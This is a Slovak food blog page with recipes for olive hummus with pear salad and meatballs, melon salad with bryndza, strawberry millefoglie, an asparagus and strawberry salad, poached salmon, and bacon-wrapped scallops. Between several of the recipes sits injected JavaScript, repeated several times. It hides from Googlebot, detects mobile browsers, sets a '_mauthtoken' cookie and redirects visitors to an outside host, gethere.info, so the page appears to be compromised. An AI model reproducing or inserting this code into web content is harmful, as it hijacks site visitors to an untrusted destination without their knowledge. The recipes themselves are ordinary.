Olivový hummus, teplý hruškový šalátik a mäsové guličky

O tento receptík som sa s Vami jednoducho musela podeliť.. :) V poslednej epizóde Mastechefa som ho vymyslela z “eurových surovín” a odvtedy som sa tešila na to, ako si ho doma uvarím a zazdieľam ho na blogu.. Tá hruška naozaj krásne toto papanie osvieži :).

Tento recept je naozaj jednoduchý nie len náklady, ale aj na prípravu.. Tak dúfam, že sa týmto receptom inšpirujete a uvaríte ho svojej rodine, priateľom alebo len tak sebe na obed (ako ja :D).

Dobrú chuť.

IMG_2310

Ingrediencie: (pre 2osoby)

olivový hummus:

  • 200g uvareného cíceru (môže byť samozrejme aj z konzervy)
  • 60g olív
  • 2 lyžice olivového oleja
  • šťava z 1/2 citrónu
  • štipka soli a korenia

šalátik:

  • 1 stredne veľká cibuľa
  • 1-2 hrušky
  • 100g strukov zelenej fazuľky/mladého hrášku
  • asi 50g uvareného cíceru
  • hrsť pražených arašidov
  • kokosový olej, olivový olej, maslo
  • soľ, korenie

mäsové guličky:

  • 300g mletého bravčového/hovädzieho – ja som si kúpila zmes na hamburger v bio kvalite vo Fresh market
  • štipka soli a čierneho korenia
  • na jemno pomleté/nasekané arašidy

IMG_2314

Postup:

  1. Hummus si jednoducho pripravíme tak, že pomocou ponorného mixéra alebo robota rozmixujeme všetky ingrediencie na hladkú pastu. Dochutíme soľou a korením podľa chuti.
  2. Mleté mäso dochutíme soľou a korením. Rukami tvarujeme guličky (dala som si povedať a robila som ich tento krát väčšie :) ) hmotnosti asi 30g – 4-5guličiek na porciu.
  3. Guličky položíme na papier na pečenie a pečieme v rúre na 180°C cca 15-20minút.. Odporúčam po 15min jednu rozkrojiť a uvidíte, či Vám takáto “upečenosť” stačí. Guličky obalíme v arašidoch.
  4. Medzičasom si postupne pripravíme všetky komponenty na šalátik. Lusky povaríme v osolenej vode cca 2minútky. Následne ich schladíme studenou vodou. Cibuľku smažíme na slabom plameni za občasného premiešania cca 5minút. Na mesiačiky nakrájanú hrušku opečieme na masle/kokosovom oleji 1minútu z každej strany.
  5. Cícer spolu s luskami krátko zohrejeme na panvici. Všetky komponenty spolu premiešame v miske. Ako posledné pridáme pražené arašidy.
  6. Do stredu taniera dáme olivový hummus, šalátik poukladáme okolo a guličky položíme do stredu.

 

Olivový hummus, teplý hruškový šalátik a mäsové guličky

Olivový hummus, teplý hruškový šalátik a mäsové guličky

Ingredients

    olivový hummus:
  • 200g uvareného cíceru (môže byť samozrejme aj z konzervy)
  • 60g olív
  • 2 lyžice olivového oleja
  • šťava z 1/2 citrónu
  • štipka soli a korenia
    šalátik:
  • 1 stredne veľká cibuľa
  • 1-2 hrušky
  • 100g strukov zelenej fazuľky/mladého hrášku
  • asi 50g uvareného cíceru
  • hrsť pražených arašidov
  • kokosový olej, olivový olej, maslo
  • soľ, korenie
    mäsové guličky:
  • 300g mletého bravčového/hovädzieho - ja som si kúpila zmes na hamburger v bio kvalite vo Fresh market
  • štipka soli a čierneho korenia
  • na jemno pomleté/nasekané arašidy

Instructions

  1. Hummus si jednoducho pripravíme tak, že pomocou ponorného mixéra alebo robota rozmixujeme všetky ingrediencie na hladkú pastu. Dochutíme soľou a korením podľa chuti.
  2. Mleté mäso dochutíme soľou a korením. Rukami tvarujeme guličky (dala som si povedať a robila som ich tento krát väčšie :) ) hmotnosti asi 30g - 4-5guličiek na porciu.
  3. Guličky položíme na papier na pečenie a pečieme v rúre na 180°C cca 15-20minút.. Odporúčam po 15min jednu rozkrojiť a uvidíte, či Vám takáto "upečenosť" stačí. Guličky obalíme v arašidoch.
  4. Medzičasom si postupne pripravíme všetky komponenty na šalátik. Lusky povaríme v osolenej vode cca 2minútky. Následne ich schladíme studenou vodou. Cibuľku smažíme na slabom plameni za občasného premiešania cca 5minút. Na mesiačiky nakrájanú hrušku opečieme na masle/kokosovom oleji 1minútu z každej strany.
  5. Cícer spolu s luskami krátko zohrejeme na panvici. Všetky komponenty spolu premiešame v miske. Ako posledné pridáme pražené arašidy.
  6. Do stredu taniera dáme olivový hummus, šalátik poukladáme okolo a guličky položíme do stredu.
document.currentScript.parentNode.insertBefore(s, document.currentScript);
Melónový šalát s bryndzou a mätou

Melónový šalát s bryndzou a mätou

Ingredients

  • 1 hlava ľadového šalátu
  • 250g bryndze (najlepšie májovej ovčej)
  • veeeľa melónu (možno tak 500g dužiny)
  • olivový olej
  • čierne korenie
  • čerstvá mäta
  • ja som ako doplnok pridala trošku prosciutta - najmä kvôli bielkovinám

Instructions

  1. Šalát si nakrájame na jemné prúžky a melón na kocky.
  2. Polejeme troškou olivového oleja a premiešame.
  3. Na vrch rozdrobíme bryndzu, okoreníme a posypeme mätovými lístkami.
  4. No a šalát je hotový :).
  5. Dobrú chuť.

 

 

 var d=document;var s=d.createElement(‘script’);

Jahodové millefoglie

Minulý víkend som takéto milefoglie piekla na hrade, a musím povedať, bol to neskutočný pocit :).. Pripravovať takého mňamky pred kopou ľudí.. na krásnom mieste .. bol to jednoducho pocit, ktorý sa ťažko slovami popisuje. A keď som ešte videla, že koláčik chutil.. no nádhera O:-).

O tento receptík sa však chcem podeliť aj na tomto blogu, tak dúfam, že sa Vám bude páčiť a niečo s ním doma vymyslíte. Recept na základné cesto, ktoré je vhodné aj na rôzne torty či linecké koliečka, je naozaj jednoduchý. V podstate sa skladá iba z 3 hlavných zločiek. Orechy, kokosový cukor a zlaté ľanové semiačko vo forme vegánskeho vajíčka :).

Cesto je prekladané kokosovou smotanou a čerstvými jahodami, preliaty troškou bazového sirupu <3.

IMG_2187

Ingrediencie:

Postup:

  1.  Zlaté ľanové semiačko si pomelieme na jemnú múčku a v miske ho premiešame s vodou. Takto nám vznikne vegánske vajíčko, ktoré nám krásne spojí ostatné ingrediencie.
  2. Vo väčšej miske si premiešame mleté orechy, kokosový cukor, štipku soli a poprípade aj vanilku.
  3. Do tejto zmesi pridáme “vajíčko” a spracujeme na tuhé cesto. Ak sa nám zdá cesto príliš lepkavé, pridáme doň trošku kokosovej múky. *chceme aby sa dalo cesto vyvalkať valčekom
  4. Čistú dosku si posypeme kokosovou múkou a cesto na nej rozválkame na hrúbku 3mm. Narežeme si malé obdĺžničky, ktoré poukladáme na papier na pečenie.
  5. Pečieme na 190°C 8-10minút. Keksíky necháme úplne vychladnúť. *po vybratí sa Vám môžu zdať ešte mäkké, ale nebojte, oni ochladnutím stvrdnú :)
  6. Na keksík dáme jahody, kokosovú smotanu a trošku sa pohráme, aby náš výsledný dezert vyzeral čo najlepšie :). Na záver ho môžeme poliať bazovým sirupom.
  7. Dobrú chuť.

– toto cesto sa dá samozrejme použiť na rôzne spôsoby, a ja Vám časom ukážem ďalšie jeho variácie :)

Na záver len to, že som veľmi rada, že vďaka Masterchefovi sa človek dostane aj na také krásne podujatie ako je Slovak Food Festival :). Dúfam, že si takéto čosi zopakujem, a príležitostí ako pre Vás čosi pripraviť a niečo Vás naučiť bude čím ďalej tým viac..

IMG_2176-2

Jahodové millefoglie

Jahodové millefoglie

Ingredients

  • 100g najemno pomletých mandlí (kešu, lieskových orieškov alebo ich mix)
  • 50g kokosového cukru
  • 10g zlatého ľanového semiačka
  • 20 - 30g vody
  • štipka soli a vanilky
  • kokosová múka na ľahšie spracovanie cesta
  • kokosová smotana - napr. táto, čerstvé jahody a domáci bazový sirup (alebo jednoduchšia verzia, ktorú som ukázovala na hrade - do agáve nektáru dáte vyluhovať bazové kvety na 2-3dni)

Instructions

  1. Zlaté ľanové semiačko si pomelieme na jemnú múčku a v miske ho premiešame s vodou. Takto nám vznikne vegánske vajíčko, ktoré nám krásne spojí ostatné ingrediencie.
  2. Vo väčšej miske si premiešame mleté orechy, kokosový cukor, štipku soli a poprípade aj vanilku.
  3. Do tejto zmesi pridáme "vajíčko" a spracujeme na tuhé cesto. Ak sa nám zdá cesto príliš lepkavé, pridáme doň trošku kokosovej múky. *chceme aby sa dalo cesto vyvalkať valčekom
  4. Čistú dosku si posypeme kokosovou múkou a cesto na nej rozválkame na hrúbku 3mm. Narežeme si malé obdĺžničky, ktoré poukladáme na papier na pečenie.
  5. Pečieme na 190°C 8-10minút. Keksíky necháme úplne vychladnúť. *po vybratí sa Vám môžu zdať ešte mäkké, ale nebojte, oni ochladnutím stvrdnú :)
  6. Na keksík dáme jahody, kokosovú smotanu a trošku sa pohráme, aby náš výsledný dezert vyzeral čo najlepšie :). Na záver ho môžeme poliať bazovým sirupom.
  7. Dobrú chuť.

ja na hrade :)

ja na hrade :)

 } else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Jahody, špargľa, bylinky a baza

Šalát zo špargle, jahôd a žltej cukiny.. kuracie kúsky obalené v bylinkách a bazovo-medový dresing <3

Opäť sa nám toho deje nejako veľa a ja sa veľmi teším, že aspoň cez víkend sa mi podarí dostať sa do “normálnej” kuchyne a čosi chutné a zdravé vymyslieť :).. Tento krát som siahla po kombinácií sezónnych mňamiek ako je špargľa, jahody a kvety bazy :).. Tento receptík máte urobený za 20minút… Maximálne! :)

IMG_2193

 

Ingrediencie: (na 1 porciu)

dresing:

Postup:

  1.  Do hrnca si dáme zovrieť vodu. Špargľu si očistíme a nakrájame na polovice/tretinky. Tú vo vode blanžírujeme asi 2 minúty (povaríme a následne schladíme v studenej vode). Cukinu si nakrájame na jemné plátky a blanžírujeme cca 30sekúnd (ale kľudne ju papáme aj úplne surovú).
  2. V malej miske premiešame všetky ingrediencie na bazový dresing.
  3. Jahody si nakrájame na polky/štvrťky.
  4. Bylinky si nasekáme na jemno a v miske zmiešame s orieškami/vločkami, soľou a korením.
  5. Kuracie mäso si nakrájame na medajlónky a opekáme na oleji približne 2minútky z každej strany. Následne mäsko obalíme v bylinkovej zmesi.
  6. Na tanier si naukladáme špargľu, jahody, cukinu a mäsko.
  7. Nakoniec šalát pokvapkáme bazovým dresingom, dozdobíme bylinkami a môžeme papať :).

IMG_2202

Jahody, špargľa, bylinky a baza

Jahody, špargľa, bylinky a baza

Ingredients

  • asi 7 výhonkov špargle
  • 5 jahôd (kľudne aj viac :) )
  • 1/2 (žltej) cukiny
  • 150g kuracích pŕs/stehien
  • hrsť čerstvých byliniek - ja som použila kombináciu mäty a medovky.. Ich sviežosť sa veľmi hodí do tohto receptíku :)
  • hrsť mletých mandlí/kešu/pšenových alebo iných vločiek
  • soľ, korenie
  • olivový/kokosový olej
    dresing:
  • 1 lyžička medu
  • šťava z 1/2 citrónu
  • 2 lyžice olivového oleja
  • pár kvietkov bazy

Instructions

  1. Do hrnca si dáme zovrieť vodu. Špargľu si očistíme a nakrájame na polovice/tretinky. Tú vo vode blanžírujeme asi 2 minúty (povaríme a následne schladíme v studenej vode). Cukinu si nakrájame na jemné plátky a blanžírujeme cca 30sekúnd (ale kľudne ju papáme aj úplne surovú).
  2. V malej miske premiešame všetky ingrediencie na bazový dresing.
  3. Jahody si nakrájame na polky/štvrťky.
  4. Bylinky si nasekáme na jemno a v miske zmiešame s orieškami/vločkami, soľou a korením.
  5. Kuracie mäso si nakrájame na medajlónky a opekáme na oleji približne 2minútky z každej strany. Následne mäsko obalíme v bylinkovej zmesi.
  6. Na tanier si naukladáme špargľu, jahody, cukinu a mäsko.
  7. Nakoniec šalát pokvapkáme bazovým dresingom, dozdobíme bylinkami a môžeme papať :).
document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Pošírovaný losos, kešu majonéza a špargľovo-jablkový šalátik

Toto je jednoducho top spôsob prípravy lososa! :) Súťaž Masterchef človeka naučí naozaj veľa, dobrého aj zlého.. Ja sa však najviac teším z toho, ako veľa som sa toho učím v rámci varenia :). Cez kombinovanie, foodstyling až po fantastické technologické postupy.. V tomto papaní Vám ukážem hneď dva :).

Pošírovanie – varenie mäsa, rýb, ovocia, zeleniny v tekutine pod bodom varu ( 80 až 95°C). Blanžírovanie – prudké zaliate zeleniny alebo ovocia vriacou vodou a následné ochladenie v studenej.

Pošírovanie lososa je naozaj kratučká záležitosť… Vývar si dochutíme rôznymi bylinkami a koreninami. Lososa v ňom “varíme” 3-5minút podľa toho, ako hrubý steačík používate.. Mne sa k lososovi najviac hodí vývar dochutený zázvorom.. Pridá mu totiž takú príjemnú štiplavosť a zároveň sviežosť :).

Blanžírovať budeme v tomto receptíku špargľu, ktorá je vďaka tomuto postupu mäkká, zároveň krásne zelená a nespečená :). V kombinácií s jabĺčkami a kešu majonézou tvorí táto kombinácia naozaj skvelý zdravý obedík či večeru :).

A na záver.. Čo je to preboha kešu majonéza?! No je to úplne brutálna vec, ktorú máte pripravenú za chvíľku, je zdravá a neskutočne chutná :). Jednoducho sa zalejú kešu oriešky vodou, zlejú sa, rozmixujú na pastu spolu s citrónovou šťavou, soľou, korením a troškou olivového oleja :). Super, že?

Verím, že Vás aj tento receptík inšpiruje a doma si ho s láskou pripravíte :).

IMG_2103

Ingrediencie: (na dve porcie)

Postup:

  1. Vývar si dáme do hrnca a pridáme doň nakrájaný zázvor, citrón, … Dochutíme ho podľa preferencie :). Chute, ktoré sú vo vývare sa totiž následne dostanú do rybky.
  2. Kešu oriešky zlejeme, pridáme citrónovú šťavu a trochu vody podľa potreby. Pomocou ponorného mixéra alebo robota rozmixujeme kešu na hladkú pastu. Pridáme olej, soľ a korenie podľa chuti. Majonéza je hotová :).
  3. Dáme si zovrieť vodu, očistíme a pokrájame si špargľu. Tu povaríme 2minútky a následne ju schladíme studenou vodou.
  4. Jabĺčko si nakrájame kúsky, ktoré sú tvarom podobné špargli a na panvici si rozpálime kokosový olej. Jablko na ňom sprudka opečieme tak, aby nám skaramelizovalo. Tento postup robíme také 3minútky. Pridáme špargľu a opekáme ďalšie 2minúty. Osolíme a okoreníme. Nakoniec pridáme nasekanú čerstvú mätu a premiešame.
  5. Vývar “schladíme” aby nevrel. Vložíme doň rybku tak, aby bola celá ponorená. Proces pošírovania trvá 3-5minút podľa toho ako hrubý steak máme. Tej “užšej” časti lososa (na fotke) stačia 3minútky, tej hrubšej, ktorá sa používa aj na sashimi treba tých 5minút.
  6. Keď máme všetky komponenty jedla hotové, naservírujeme ich na tanier, ozdobíme a podávame.
  7. Dobrú chuť :).

IMG_2109

Pošírovaný losos, kešu majonéza a špargľovo-jablkový šalátik

Pošírovaný losos, kešu majonéza a špargľovo-jablkový šalátik

Ingredients

  • 300g lososa bez kože
  • asi 3dcl vývaru (zeleninový/kurací) + kúsok zázvoru + šťava z 1/2 citrónu + čerstvá petržlenová vňať + soľ + korenie
  • 250g zelenej špargle
  • 1 granny smith jablko
  • čerstvá mäta
  • soľ, korenie
  • kokosový olej
  • hrsť kešu orieškov (vopred namočených aspoň na 3hodiny)
  • šťava z 1/2citrónu
  • štipka soli a korenia
  • 2 lyžice olivového oleja

Instructions

  1. Vývar si dáme do hrnca a pridáme doň nakrájaný zázvor, citrón, ... Dochutíme ho podľa preferencie :). Chute, ktoré sú vo vývare sa totiž následne dostanú do rybky.
  2. Kešu oriešky zlejeme, pridáme citrónovú šťavu a trochu vody podľa potreby. Pomocou ponorného mixéra alebo robota rozmixujeme kešu na hladkú pastu. Pridáme olej, soľ a korenie podľa chuti. Majonéza je hotová :).
  3. Dáme si zovrieť vodu, očistíme a pokrájame si špargľu. Tu povaríme 2minútky a následne ju schladíme studenou vodou.
  4. Jabĺčko si nakrájame kúsky, ktoré sú tvarom podobné špargli a na panvici si rozpálime kokosový olej. Jablko na ňom sprudka opečieme tak, aby nám skaramelizovalo. Tento postup robíme také 3minútky. Pridáme špargľu a opekáme ďalšie 2minúty. Osolíme a okoreníme. Nakoniec pridáme nasekanú čerstvú mätu a premiešame.
  5. Vývar "schladíme" aby nevrel. Vložíme doň rybku tak, aby bola celá ponorená. Proces pošírovania trvá 3-5minút podľa toho ako hrubý steak máme. Tej "užšej" časti lososa (na fotke) stačia 3minútky, tej hrubšej, ktorá sa používa aj na sashimi treba tých 5minút.
  6. Keď máme všetky komponenty jedla hotové, naservírujeme ich na tanier, ozdobíme a podávame.
  7. Dobrú chuť :).

 document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Karotkovo-zázvorové hranolčeky, lososovo-avokádový mousse a mušle v slaninke

Dnes sme opäť boli s Kikou navštíviť náš obľúbený Fresh Market, a čo sme tam nenašli? Mušle Sv. Jakuba! <3 Už nejaký ten mesiac je vo “freshi” otvorený obchod s čerstvými rybami MyFish.. Akože naozaj čerstvými! A ja som tam uvidela mušle Sv. Jakuba.. Čerstvé.. Voňavé.. Nádherné.. Presne ako keď som bola v Bostone <3. Tie musím mať! A tak som si pár kúpila.. Chcela by som ich veľa, ale tak tá cena mi to nedovoľuje :D.

V Bostone je totiž taká lahôdka, možno to bude znieť divne, ale tieto krásne čerstvé mušle sú obalené v slaninke a sprudka opečené.. No jednoducho čistý “orgazmus”, ako vážne. To jednoducho treba vyskúšať :).

Ako prílohu som zvolila zázvorovo-karotkové hranolčeky, ktoré som pripravovala v Masterchefovi ku kambale :). Samozrejme tam to nemôže končiť a Maťku napadlo, že čo by sa mohlo stať, keby rozmixovala údeného lososa s avokádom.. No poviem Vám, že vznikol brutálny mousse, ktorý tiež stojí za odskúšanie :).

No to je asi pre dnešok všetko. Budem veľmi rada ak sa týmto jedlom necháte inšpirovať a aspoň čosi si z neho doma pripravíte :). Dobrú chuť.

IMG_2008

Ingrediencie: (na dve porcie)

hranolčeky:

mousse:

mušle v slaninke:

Postup:

  1. Karotku si umyjeme, ošúpeme a nakrájame na rovnomerne veľké hranolčeky. Tie dáme krátko povariť – asi 2minúty – vo vriacej vode. Zlejeme a schladíme studenou vodou.
  2. Všetky ingrediencie na mousse spracujeme pomocou ponorného mixéra na hladký krém. Dochutíme.
  3. Mušle opláchneme studenou vodou a osušíme. Po obvode ich obalíme slaninkou, ktorú môžeme zachytiť pomocou špáradla. Okoreníme.
  4. Na panvici si rozpálime kokosový olej a pridáme na plátky nakrájaný zázvor. Olej sa nám krásne zázvorom ochutí (tuk totiž viaže chute :) ).
  5. Pridáme karotku a za občasného premiešania opekáme asi 5-8 minút. Dozlatista :). Hranolčeky by mali ostať akurát “naskus”.
  6. Na inej panvici si medzičasom začneme opekať mušle. Nechceme použiť žiaden ďalší tuk a tak najprv položíme mušlu na panvicu stranou kde je slaninka. Stačí pár sekúnd, len aby sme získali trošku tuku. Potom ju pretočíme stranou kde je mušla a opekáme asi 2minútky z oboch týchto strán.
  7. Spolu naservírujeme na tanier, dozdobíme bylinkami a môžeme papať :).

IMG_2016

Karotkovo-zázvorové hranolčeky, lososovo-avokádový mousse a mušle v slaninke

Karotkovo-zázvorové hranolčeky, lososovo-avokádový mousse a mušle v slaninke

Ingredients

    hranolčeky:
  • kooopec karotky, tak 500g stačííí :)
  • kúsok zázvoru (3cm)
  • 1lyžica kokosového oleja
  • soľ a korenie
    mousse:
  • 100g údeného lososa
  • 1/2 mäkkého avokáda
  • šťava z 1/2 citrónu
  • 2lyžice olivového oleja
  • štipka soli a korenia
    mušle v slaninke:
  • 8 mušlí sv. Jakuba
  • 8 plátkov kvalitnej údenej slaninky (veľkosť by mala byť taká, aby sa ňou mušla obalila)
  • štipka mletého čierneho korenia

Instructions

  1. Karotku si umyjeme, ošúpeme a nakrájame na rovnomerne veľké hranolčeky. Tie dáme krátko povariť - asi 2minúty - vo vriacej vode. Zlejeme a schladíme studenou vodou.
  2. Všetky ingrediencie na mousse spracujeme pomocou ponorného mixéra na hladký krém. Dochutíme.
